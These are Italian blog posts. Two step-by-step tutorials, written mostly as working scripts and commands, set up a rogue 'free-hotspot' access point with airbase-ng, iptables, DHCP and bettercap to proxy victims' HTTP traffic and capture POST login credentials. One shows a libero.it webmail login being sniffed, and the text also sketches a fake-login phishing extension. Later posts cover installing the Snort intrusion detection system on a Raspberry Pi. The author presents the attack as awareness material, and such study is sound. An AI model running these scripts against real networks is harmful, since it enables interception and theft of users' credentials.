Try this ONLY at home #2 – Rouge AP – Sniffing http traffic

Poiché l’articolo sul Wi-Fi sniffing è piaciuto molto, mi è stato chiesto anche un articolo che spiegasse la cosa in modo più approfondito utilizzando questa volta una scheda Wi-Fi esterna e la macchina virtuale di Kali Linux.

Cosa ci servere?

1. Una scheda wireless che supporti il  “Monitore Mode”

Ce ne sono tante e da tutti i prezzi. Io ne utilizzo due:

– TP-LINK TL-WN722N che è solo sulla banda 2.4Ghz
– ALFA AWUS051NH v.2 che è sia 2.4GHz che 5Ghz.

Questo tutorial parte dal fatto che la scheda integrata sul vostro PC non sia in grado di andare in Monitor Mode e quindi utilizziate una ulteriore adattatore Wi-Fi esterno. Ad esempio uno dei due presentati sopra. Kali Linux ha già tutti i driver e quindi l’utilizzo di una di queste due schede non richiede l’installazione di software/driver aggiuntivi.

2. La macchina VirtualBox o VMWare di Kali Linux

La potete scaricare dal sito di Offensive Security.

Io utilizzo quella Virtual Box a 64 bit (full, non light). Se volete seguire questo tutorial dovete anche voi scaricare quella full così abbiamo già gli stessi tool preinstallati ed andremo ad aggiungere solo quelli mancanti.


Mi raccomando una volta scaricata controllate la firma sha-256 che su linux e osx potete fare con il comando shasum mentre su Windows potete farlo con SevenZip che, molti non lo sanno, nel menù contestuale vi mette la possibilità di fare l’hash con algoritmo sha di qualunque file.

Fatta partire la macchina virutale vi presenterà il prompt di login. Le credenziali di default sono:

user: root
password: toor

3. Gli script del tutorial

Per l’occasione ho anche messo su GitHub un repository con gli script che utilizzeremo in questo articolo. Lo trovate qui.

Se siete connessi col cavo di rete prendete gli script direttamente dalla cartella rouge_ap altrimenti se siete connessi con la scheda Wi-Fi del vostro PC allora prendete gli script presenti all’interno della cartella wlan0wlan1.

Avete preso nota di tutto?

Okay Partiamo.

Quindi fatta partire la macchina virtuale la prima cosa da fare è il clone del repository

git clone https://github.com/shadowsheep1/tutorials.git

Spostatevi nella cartella rouge_ap o rouge_ap/wlan0wlan1 a seconda della vostra configurazione.

Io mi sposterò nella cartella rouge_ap perché anche se questa volta sono collegato con la scheda Wi-Fi del PC, tale scheda sulla macchina virtuale è sempre vista come interfaccia eth0.

Poi colleghiamo la scheda di rete Wi-Fi USB esterna e tramite VirtualBox connettiamola alla nostra macchina virtuale Kali.

E con un dmesg vediamo che l’hardware è stato riconosciuto

Abbiamo ora la nostra bella interfaccia wlan0 con cui andare a fare l’Access Point Malevolo.

Ora installiamo un server DHCP, perché vogliamo dare ai nostri client una configurazione differente rispetto alla nostra. Solo per aggiungere un po’ di know how al tutorial. Potremmo anche lasciare che il DHCP lo faccia il nostro router.

Per questo tutorial installiamo isc-dhcp-server.

apt-get update && \
apt-get install isc-dhcp-server && \
dhcpd --version

Poi ci server sempre Bettercap.

Le istruzioni per installarlo le trovate sul sito ufficiale.

Il metedo più pulito per l’installazione di bettercap è utilizzare gem.

Quindi:

apt-get update && \
gem install bettercap && \
bettercap --version

Bene abbiamo tutto! 🙂

Possiamo partire con i nostri scritpt.

01_setup_eth0.sh

echo "nameserver 8.8.8.8" > /etc/resolv.conf
cat /etc/resolv.conf
ping www.versionestabile.it -c 3

Questo script potete anche non eseguirlo se volete.

Non fa altro che configurare com server DNS quello di Google (è quasi sempre uno dei più aggiornti).

Ho voluto inserire questo script per chi non sapeva come configurare da riga di comando il server DNS della propria distribuzione linux.

02_setup_ap_wlan0.sh

airmon-ng check kill && \
airmon-ng start wlan0 && \
airbase-ng --essid "free-hostspot" -c1 wlan0mon

Questo script lo avete già laniciato anhe nel tutorial precedente e non fa altro che configurare l’hotspot Wi-Fi con SSID “free-hotspot”.

Lasciate ovviamente aperto questo terminale e apritene un’altro su cui lanciare gli script rimanenti.

03_setup_at0.sh

ifconfig at0 up && \
ifconfig at0 192.168.2.1/24

Questo script configura la scheda di rete logica dell’Access Point (come nel precedente tutorial) e gli assegna il primo indirizzo della rete 192.168.2.0/24.

04_setup_iptables.sh

iptables -F
iptables -t nat -F
iptables -X
iptables -t nat -X
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i at0 -j ACCEPT
#iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8888

Questo script configura le regole del firewall per il routing e il forwarding.

Una breve descrizione per chi è nuovo a iptables:

  • Il primo comando cancella tutte le regole per la rete del PC.
  • Il secondo comando cancella tutte le regole per la tabella NAT (Network Address Translation)
  • Il terzo comando cancella tutte le catene per la rete del PC.
  • Il quarto comando cancella tutte le catene per la tabella NAT.
  • Il quinto comando A(ggiunge) alla tabella NAT la regola di POSTrouting in cui tutti i pacchetti che vengono fatti uscire (-o) sull’interfaccia eth0 vengono mascherati, ovvero, fa in modo che i anche i pacchetti di una rete differente a quella del PC ma che passano attraverso di lui, vengano re-indirizzati sempre al nostro PC.
  • Il sesto comando A(aggiunge) alle regole della rete del PC il FORWARD dei pacchetti. Ovvero fa in modo che tutti i pacchetti non appartenenti alla rete del PC non vangano “droppati” (ignorati e scartati) ma vengano fatti passare secondo le regole di routing (POST e/o PRE) ipostate.
    L’ultimo comando l’ho commentato perchè lo fa già in automatico bettercap quando viene lanciato. Ovvero su tutti i pacchetti di tipo TCP sulla porta 80 non appartenenti alla rete di queto PC prima di farne il ROUTING vengono rediretti alla porta 8888 (dove ovviamente sarà in ascolto il nostro sniffer).

05_enable_fwd.sh

echo 1 > /proc/sys/net/ipv4/ip_forward
more /proc/sys/net/ipv4/ip_forward

Non basta configurare il firewall affinchè faccia il FORWARD dei pacchetti non appartenenti alla sua rete, ma occorre anche abilitare la cosa a livello di sistema operativo. E quello che fa questo script.

06_start_dhcp.sh

touch /var/lib/dhcp/dhcpd.leases 
dhcpd -cf ./dhcpd.conf

Facciamo partire il server DHCP con la configurazione che abbiamo preparato nel nostro file  dhcp.conf.

Prima crea (se non esiste) il file database dei lease, perchè se non c’è il server si arrabbia (non so perchè non lo crei, magari c’è un comando, ma non avendo mai avuto problemi facendo prima il touch, non ho indagato in merito).

#ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.2.255;
option routers 192.168.2.1;
option domain-name-servers 8.8.8.8;
range 192.168.2.51 192.168.2.100;
}

Questo file configura come si deve comportare il nostro server DHCP.

In particolare a tutti i dispositivi che richiedono la configurazione di rete (quelli che si collegano al nostro Access Point) diamo come IP quelli della rete 192.168.2.0/24 a partire dal .51 fino al .100 (quindi ne accettiamo 50, bastano?)

A voi lo studio e le prove di altre configurazioni 😉

07_bettercap.sh

bettercap --proxy --proxy-port 8888 -I at0 --no-spoofing --no-discovery -P POST --log bettercap.log

E infine lanciamo il nostro sniffer (quello del precedente tutorial).

Lo lanciamo come proxy sulla porta 8888, sull’interfaccia at0, senza fare ARP spoofing questa volta, senza ricerca dei dispositivi (li conosciamo bene 😉 ) con il parser sui log per le richieste http POST e salvando il log nel file “bettercap.log”.

Adesso il mio buon vecchio iPhone5 abbocca e la storia la conoscete bene 😉

Vediamo il nostro free-hotspot

Ci colleghiamo e una volta collegati se clicchiamo sull’icona delle informazioni (i) vediamo che l’iPhone5 da bravo ci dice che la rete è insicura (ma nessuno mai ci bada, tanto abituati siamo negli aereoporti o stazioni ad avere hotstpot senza password).

E vediamo anche che il nostro server DHCP si è comportato bene dando al dispositivo la configurazione IP che gli avevamo detto di dare 😉

CONCLUSIONI

Siamo arrivati alle conclusioni. Innazitutto non smetterò mai di ripeterlo, questo post è solo divulgativo per imparare a conoscere come funzionano le cose in questi casi. Non va fatto mai assolutamente (è REATO) una cosa del genere in pubblico.

Poi pensate. Una volta che avete l’Access Point malevolo, avete visto che configurando il vostro PC in maniera opportuna, siete i completi detentori del traffico di quel dispositivo.

Mettiamo ora il caso, per esempio di voler anche redirigere le richieste di Google o Facebook  (parliamo di Web e non di App) su un sito che risiede sul nostro PC e che si presenta in maniera identica ai loro. Qui dopo che l’utente ha inserito il suo nome utente e la sua password ce le salviamo e redirigiamo il traffico verso i siti reali. Ovviamente è REATO e illegale, ma lo diciamo sempre e solo per renderci conto della pericolosità della cosa nel caso dietro ad un Free-Hotspot ci sia un malintenzionato.

Quindi pensateci sempre due volte prima di collegarvi ad un hotspot senza password, e se potete navigate con la connessione dati 3G/4G del cellulare!

Spero che anche questo articolo vi sia piaciuto. Alla prossima!

Try this ONLY at home #2 – Rouge AP – Sniffing http traffic

Do this ONLY at home – WiFi Sniffing

E’ incredibile, come ancora nel 2017 ci siano siti che gestiscono dati e credenziali di milioni di utenti e che non abbiano l’accesso solo tramite HTTPS e implementato l’HSTS… ma questa è un’altra storia.

Oggi vedremo, per questi siti che ancora oggi o non hanno l’HTTPS o se ce l’hanno non hanno l’HSTS, come sia possibile (e facile) sniffare le credenziali degli utilizzatori che accedono ai loro servizi via web!!!

Per fare questo occorre una distribuzione linux con già installati alcuni strumenti.

Per l’occasione io consiglio Kali linux – https://www.kali.org/

Scegliete voi se installarla in dual boot o con una macchina virutale (io consiglio il dual boot su Mac, che pare proprio innocuo e fornisce già la scheda wireless che può andare in monitor mode).

Quale dei due PC sembra più minaccioso? 🙂

Infatti per poter eseguire il test dovete avere una scheda Wi-Fi che consente di essere messa in “monitor mode“.

Un MacBook Air Mid 2012 o una Alfa Card, vanno benissimo. Ma ci sono tante altre schede di rete USB che possono andare bene, basta fare una ricerca online.

Io scelgo quindi l’HW più a sinistra nella foto, in quanto più innocuo (vedete il gatto come è tranquillo vicino ad esso?). Ovviamente non vi dovete immaginare sul lettino al mare con questo PC in questa configurazione. Ovviamente no!

A questo punto facciamo il boot di Kali linux e installiamo bettercap.

Bene siamo a posto… ^^’ non dovete installare più nulla.

Ah! Dimenticavo, poichè la scheda Wi-Fi la usiamo come Rouge-AP, dovremo avere anche una seconda connessione per connetterci in internet.

Possiamo utilizzare un adattatore USB-Eth per connettere il nostro Mac al nostro router di casa. Perché solo a casa vanno fatti questi test, mi raccomando.

Se invece vi state immaginando in un bar pubblico, allora vi dovete immaginare di collegare il tutto ad un router 3G o 4G con connettore RJ-45 (ma non immaginatelo!!!)

Okay.

Primo script dell’apprendista scr1pt k1dd13:

#!/bin/bash
airmon-ng check kill
airmon-ng start wlan0
airbase-ng -e "free-hostspot" -c1 wlan0mon

Salvate il codice bash soprastante in un file, rendetelo eseguibile e lanciatelo.

Salvatelo per vostro repertorio 😉

Questo vi creerà l’Access Point con un SSID “free-hostspot” sul canale 1 della frequenza 2.4GHz.

Secondo script dell’apprendista scr1pt k1dd13:

ifconfig at0
brctl addbr br1
brctl addif br1 eth0
brctl addif br1 at0
brctl show
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig br1 192.168.1.206/24 up
echo 1 > /proc/sys/net/ipv4/ip_forward
route add default gw 192.168.1.1

Anche qui salvate il codice bash soprastante in un file, rendetelo eseguibile e lanciatelo.

Questo script controlla l’intefaccia logica at0 dell’access point, che viene creata da airbase-ng quando creea l’Access Point.

Crea un bridge di nome “br1” e lo associa ad eth0 e at0.
Quindi queste due interfacce sono ora tra loro collegate.

Mostra la configurazione del bridge.

Setta ANY address ad eth0 e at0 e un indirizzo di rete (che non rientri nel DHCP) al bridge.

Abilita il routing (packet forwarding) sul sistema operativo.

Aggiunge nuovamente la default route (gateway) al sistema operativo.

Molto bene.

Ora lanciamo bettercap sull’interfaccia del bridge “br1” (-I br1) in proxy mode (–proxy) e col parser log sulle chiamate POST (-P POST).

Bettercap ci crea in automatico le regole del firewall (iptables) per il proxy e il routing.

E comincia a fare anche del gran ARP spoofing… perfino il PC Windows ne è rimasto travolto.

Ma per fortuna GlassWire mi ha avvertito! Vi ricordate l’articolo sui Firewall user friendly?

L’ARP spoofing in questa configurazione ci server per redirigere il traffico http verso di noi.

Poichè il traffico dell’hotspot risiede già sul nostro PC potremmo catturarlo anche senza ARP spoofing. Ma poichè la configurazione è più complessa, per lo scopo di questo articolo abbiamo scelto di non utilizzarla.

Finalmente qualcuno abbocca (il mio iPhone 5) al nostro bell’hostspot.
Potevo anche collegarmi con un altro PC al Wi-Fi, non sarebbe cambiato nulla.

Ovviamente veniamo avvistati, come per tutti gli hostspot liberi (senza password) dalla voce “Security Reccomendation” (io ho il cellulare in inglese). Ma ormai siamo abituati, perché ad esempio, anche in aereoporto abbiamo lo stesso avviso.

Navighiamo sul sito di libero.it e accediamo alla nostra casella via web.

Intanto notiamo già che non c’è la connessione sicura… niente HTTPS e lucchettino verde… vabbè, ma andiamo avanti. Facciamo il login… e sboom! Il nostro bettercap ci segnala bene bene le variabili POST del form di login.

Voilà! 🙂

Questo articolo non volevo neanche scriverlo, mi sembrava datato come argomento… ma quando questa sera ho riprovato e mi sono accorto che ancora con libero era così facile sniffare il login della loro posta, allora mi sono ripromesso di scrivere finalmente questo articolo.

Spero vi sia piaciuto, anche se scritto un po’ in fretta e a notte tarda! 😀

Alla prossima

 

Do this ONLY at home – WiFi Sniffing

Utilizzare Snort

Se non avete installato Snort, potete leggere questo nostro articolo su come installarlo su Raspberry Pi.

Se lo avete installato con il comando

apt-get install snort

Allora vi basta diminuire solamente il numero di max_tcp e lanciare il comando (vedi sotto)

snort -dev -l ./log -h 192.168.1.0/24 -c /etc/snort/snort.conf

Se lo avete installato compilando i sorgenti invece, la questione diventa più briosa in quanto occorre settare bene lo snort.config come di seguito.

Una volta installato occorre però aggiornarlo.

Seguiamo quindi i passi che ci dice la guida ufficiale su Snort.org allo Step 3:

0. Creare se non esistono le directory
root@kali:~/tmp# mkdir /etc/snort
root@kali:~/tmp# mkdir /etc/snort/rules
1. Community Rules
wget https://www.snort.org/rules/community
tar -xvfz community.tar.gz -C /etc/snort/rules
2. Registered Rules
wget https://www.snort.org/rules/snortrules-snapshot-2962.tar.gz?oinkcode=
wget https://www.snort.org/rules/snortrules-snapshot-2970.tar.gz?oinkcode=
wget https://www.snort.org/rules/snortrules-snapshot-2972.tar.gz?oinkcode=
tar -xvfz snortrules-snapshot-.tar.gz -C /etc/snort/rules
3. Subscriber Rules
... sono a pagamento ...

Creare la directory:

/usr/local/lib/snort_dynamicrules

Ridurre il max_tcp altrimenti il Raspberry non ce la fa… poverone! 😀

# Target-Based stateful inspection/stream reassembly.  For more inforation, see README.stream5
preprocessor stream5_global: track_tcp yes, \
   track_udp yes, \
   track_icmp no, \
   max_tcp 26214, \
   max_udp 131072, \
   max_active_responses 2, \
   min_response_seconds 5

cambiare i file di whitelist e blacklist:

white_list.rules -> whitelist.rule
black_list.rules -> blacklist.rule

# Reputation preprocessor. For more information see README.reputation
preprocessor reputation: \
   memcap 500, \
   priority whitelist, \
   nested_ip inner, \
   whitelist $WHITE_LIST_PATH/whitelist.rule, \
   blacklist $BLACK_LIST_PATH/blacklist.rule  

portarsi nella directory

/etc/snort/rules/etc

e lanciare il comando

snort -d -h 192.168.0.0/24 -l ./log -c snort.conf 

I parametri dipendono ovviamente dal tipo di LAN che volete monitorare.

Per i dettagli leggere il manuale di Snort su Snort.org.

A questo punto per testarlo andiamo a mettere in

/etc/snort/rules/local.rules 

la seguente regola

# $Id: local.rules,v 1.11 2004/07/23 20:15:44 bmc Exp $
# ----------------
# LOCAL RULES
# ----------------
# This file intentionally does not come with signatures.  Put your local
# additions here.

# Test ping
#alert ip any any -> any any (msg: "IP Packet detected"; sid: 8888888)
alert icmp any any -> any any (msg: "TEST PING *** ^^ *** ICMP Packet found"; sid: 888888)

Che testa anche il PING essendo una richiesta echo ICMP.

Lanciamo snort e pinghiamo il nostro gateway:

ping 192.168.0.1

andiamo quindi ad analizzare i nostri alert

more ./log/alert

e vediamo che la nostra regola ha fatto scattare l’allarme!!! 😀

[**] [1:888888:0] TEST PING *** ^^ *** ICMP Packet found [**]
[Priority: 0] 
03/27-21:14:27.294037 A8:20:66:27:D5:F6 -> E0:91:F5:F9:2D:4E type:0x800 len:0x62
192.168.0.6 -> 192.168.0.1 ICMP TTL:64 TOS:0x0 ID:12623 IpLen:20 DgmLen:84
Type:8  Code:0  ID:3591   Seq:0  ECHO
Utilizzare Snort

IDS: Snort on Raspberry PI

In questo articolo vedremo come installare un software per l’intrusion detection della nostra rete sul nostro Raspberry Pi.

Per prima cosa ci serve un sistema operativo opportuno da installare sul nostro Raspberry PI. Per questo tipo di applicazione ho scelto Kali linux il successore della distro linux BackTrack, famosissima nel campo della sicurezza IT.

Scarichiamo quindi l’immagine per processore ARM dal sito ufficiale:

https://www.kali.org/downloads/

che ci rimanda per il porting su Raspberry PI al sito

https://www.offensive-security.com/kali-linux-vmware-arm-image-download/

In base alla versione di Raspberry PI che avete scaricate la iso opportuna.

Io ho il Raspberry PI versione B e quindi ho scelto la distro Raspberry Pi A/B+

Una volta scaricato occorre copiare l’immagine sull’SD card che volete utilizzare sul Raspberry con i comandi che trovare anche sull’articolo in questo blog relativo al backup e ripristino del vostro Raspberry PI.

Riporto qui i passi fatti sul mio MacBook Air:

Fabios-MacBook-Air:~ shadowsheep$ diskutil list
/dev/disk0
   #:                       TYPE NAME                    SIZE       IDENTIFIER
   0:      GUID_partition_scheme                        *121.3 GB   disk0
   1:                        EFI EFI                     209.7 MB   disk0s1
   2:                  Apple_HFS Macintosh HD            75.0 GB    disk0s2
   3:                 Apple_Boot Recovery HD             650.0 MB   disk0s3
   4:       Microsoft Basic Data BOOTCAMP                45.5 GB    disk0s4
/dev/disk1
   #:                       TYPE NAME                    SIZE       IDENTIFIER
   0:     FDisk_partition_scheme                        *8.1 GB     disk1
   1:                 DOS_FAT_32 CHIAVINA                8.1 GB     disk1s1
Fabios-MacBook-Air:~ shadowsheep$ diskutil unmountDisk /dev/disk1
Unmount of all volumes on disk1 was successful
Fabios-MacBook-Air:~ shadowsheep$ cd Downloads/
Fabios-MacBook-Air:Downloads shadowsheep$ xz -d kali-1.1.0-rpi.img.xz
Fabios-MacBook-Air:Downloads shadowsheep$ sudo dd bs=1m if=kali-1.1.0-rpi.img of=/dev/disk1
Password:
3000+0 records in
3000+0 records out
3145728000 bytes transferred in 2055.895717 secs (1530101 bytes/sec)
Fabios-MacBook-Air:Downloads shadowsheep$

Il comando dd ci metterà un po’ a terminare. Una volta terminato avremo la nostra immagine installata sull’SD.
Una volta installata la nostra distro possiamo inseriamo l’SD card sul Raspberry e accendiamolo.

In questo tutorial io accederò al nostro Raspberry Pi solamente tramite SSH.

Ma prima occorre verificare che la dietro abbia ottenuto un IP valido e inoltre voglio ricreare una signature SSH differente da quella standard.

Per utilizzare il mio nuovo Raspberry Pi con Kali quindi attacchiamo una tastiera USB e un monitor che abbia l’ingresso HDMI.

L’utente root ha password “toor”. Cambiamola subito con “passwd”

root@kali:~# passwd
Enter new UNIX password:

Rigeneriamo quindi anche le chiave per l’SSH server

root@kali:~# cd /etc/ssh
root@kali:/etc/ssh# mkdir ssh_default_keys
root@kali:/etc/ssh# mv ssh_host* ssh_default_keys/
root@kali:/etc/ssh# dpkg-reconfigure openssh-server
Creating SSH2 RSA key; this may take some time ...
Creating SSH2 DSA key; this may take some time ...
Creating SSH2 ECDSA key; this may take some time ...
[ ok ] Restarting OpenBSD Secure Shell server: sshd.
root@kali:/etc/ssh#

Da adesso possiamo collegarci tramite SSH.

Non avendo installato una versione di linux apposta per il Raspberry ci viene a mancare la comoda utility raspi-config. Andiamo quindi ad aggiungerla manualmente alla nostra installazione di Kali linux.

wget http://archive.raspberrypi.org/debian/pool/main/r/raspi-config/raspi-config_20121028_all.deb
wget http://ftp.acc.umu.se/mirror/cdimage/snapshot/Debian/pool/main/l/lua5.1/lua5.1_5.1.5-4_armel.deb
wget http://http.us.debian.org/debian/pool/main/t/triggerhappy/triggerhappy_0.3.4-2_armel.deb
dpkg -i triggerhappy_0.3.4-2_armel.deb
dpkg -i lua5.1_5.1.5-4_armel.deb
dpkg -i raspi-config_20121028_all.deb

Una volta installato lanciamolo per espandere il nostro filesystem. Infatti l’immagine di Kali linux installata è stata fatta per essere ospitata da una SD da 4GB e quindi se ne abbiamo una più grande (come nel mio caso 8GB) dobbiamo appropriarci dello spazio mancante! 🙂

root@kali:~# df
Filesystem     1K-blocks    Used Available Use% Mounted on
rootfs           2896624 1570816   1158952  58% /
/dev/root        2896624 1570816   1158952  58% /
devtmpfs           89804       0     89804   0% /dev
tmpfs              18796     488     18308   3% /run
tmpfs               5120       0      5120   0% /run/lock
tmpfs              37580       0     37580   0% /run/shm

Screen Shot 2015-03-22 at 11.48.27 Screen Shot 2015-03-22 at 11.48.47

Facciamo il reboot del sistema e dopo averlo fatto ecco apparire tutti i nostri GB!

root@kali:~# df
Filesystem     1K-blocks    Used Available Use% Mounted on
rootfs           7633328 1573136   5701036  22% /
/dev/root        7633328 1573136   5701036  22% /
devtmpfs           89804       0     89804   0% /dev
tmpfs              18796     496     18300   3% /run
tmpfs               5120       0      5120   0% /run/lock
tmpfs              37580       0     37580   0% /run/shm

A questo punto installiamo tutti i pacchetti che la distribuzione Kali linux ci mette a disposizione per l’IT security:

root@kali:~# apt-get update && apt-cache search kali-linux
Get:1 http://http.kali.org kali Release.gpg [836 B]
Get:2 http://security.kali.org kali/updates Release.gpg [836 B]
Get:3 http://http.kali.org kali Release [21.1 kB]     
Get:4 http://security.kali.org kali/updates Release [11.0 kB]
Get:5 http://http.kali.org kali/main Sources [7570 kB]  
Ign http://security.kali.org kali/updates/contrib Translation-en            
Ign http://http.kali.org kali/contrib Translation-en                         
Ign http://security.kali.org kali/updates/main Translation-en                
Ign http://security.kali.org kali/updates/non-free Translation-en             
Ign http://http.kali.org kali/main Translation-en                              
Ign http://http.kali.org kali/non-free Translation-en                          
Get:6 http://security.kali.org kali/updates/main Sources [146 kB]              
Get:7 http://security.kali.org kali/updates/contrib Sources [20 B]             
Get:8 http://security.kali.org kali/updates/non-free Sources [20 B]            
Get:9 http://http.kali.org kali/non-free Sources [118 kB]                      
Get:10 http://security.kali.org kali/updates/main armel Packages [277 kB]      
Get:11 http://http.kali.org kali/contrib Sources [56.9 kB]                     
Hit http://security.kali.org kali/updates/contrib armel Packages               
Get:12 http://http.kali.org kali/main armel Packages [8284 kB]                 
Hit http://security.kali.org kali/updates/non-free armel Packages              
Get:13 http://http.kali.org kali/non-free armel Packages [91.2 kB]             
Hit http://http.kali.org kali/contrib armel Packages                           
Fetched 16.6 MB in 1min 55s (143 kB/s)                                         
Reading package lists... Done
kali-linux - Kali Linux base system
kali-linux-all - Kali Linux - all packages
kali-linux-forensic - Kali Linux forensic tools
kali-linux-full - Kali Linux complete system
kali-linux-gpu - Kali Linux GPU tools
kali-linux-pwtools - Kali Linux password cracking tools
kali-linux-rfid - Kali Linux RFID tools
kali-linux-sdr - Kali Linux SDR tools
kali-linux-top10 - Kali Linux Top 10 tools
kali-linux-voip - Kali Linux VoIP tools
kali-linux-web - Kali Linux webapp assessment tools
kali-linux-wireless - Kali Linux wireless tools
root@kali:~# apt-get install kali-linux-full

Andate a fare una bella passeggiata, prendete un buon aperitivo, incontrate degli amici in attesa che il sistema si installi completamente…

E infine installiamo Snort:

root@kali:~# apt-get install snort

Se voltete installare l’ultima versione di Snort a partire dai sorgenti ufficiali sul sito potete seguire le istruzioni sul sito snort.org:

Se la configurazione del daq vi da errore perché manca la libreria libpcap allora dovete installarla:

apt-get install libpcap-dev

Al termine della compilazione e installazione del daq dovreste vedere un report simile a questo.

----------------------------------------------------------------------
Libraries have been installed in:
   /usr/local/lib/daq

If you ever happen to want to link against installed libraries
in a given directory, LIBDIR, you must either use libtool, and
specify the full pathname of the library, or use the `-LLIBDIR'
flag during linking and do at least one of the following:
   - add LIBDIR to the `LD_LIBRARY_PATH' environment variable
     during execution
   - add LIBDIR to the `LD_RUN_PATH' environment variable
     during linking
   - use the `-Wl,-rpath -Wl,LIBDIR' linker flag
   - have your system administrator add LIBDIR to `/etc/ld.so.conf'

See any operating system documentation about shared libraries for
more information, such as the ld(1) and ld.so(8) manual pages.
----------------------------------------------------------------------

Se la configurazione di snort vi da errore perché non trova le librerie libpcre e libante allora installatele con il comando:

apt-get install libpcre3 libpcre3-dev
apt-get install libdumbnet-dev

Al termine invece di snort dovreste vedere un report simile a questo assieme a molte altre cose (tante!)

----------------------------------------------------------------------
Libraries have been installed in:
   /usr/local/lib/snort/dynamic_output

If you ever happen to want to link against installed libraries
in a given directory, LIBDIR, you must either use libtool, and
specify the full pathname of the library, or use the `-LLIBDIR'
flag during linking and do at least one of the following:
   - add LIBDIR to the `LD_LIBRARY_PATH' environment variable
     during execution
   - add LIBDIR to the `LD_RUN_PATH' environment variable
     during linking
   - use the `-Wl,-rpath -Wl,LIBDIR' linker flag
   - have your system administrator add LIBDIR to `/etc/ld.so.conf'

See any operating system documentation about shared libraries for
more information, such as the ld(1) and ld.so(8) manual pages.
----------------------------------------------------------------------

A questo punto avete il vostro Snort installato!

root@kali:~/tmp/snort-2.9.7.2# snort -V

   ,,_     -*> Snort! <*-
  o"  )~   Version 2.9.7.2 GRE (Build 177) 
   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/contact#team
           Copyright (C) 2014 Cisco and/or its affiliates. All rights reserved.
           Copyright (C) 1998-2013 Sourcefire, Inc., et al.
           Using libpcap version 1.3.0
           Using PCRE version: 8.30 2012-02-04
           Using ZLIB version: 1.2.7
IDS: Snort on Raspberry PI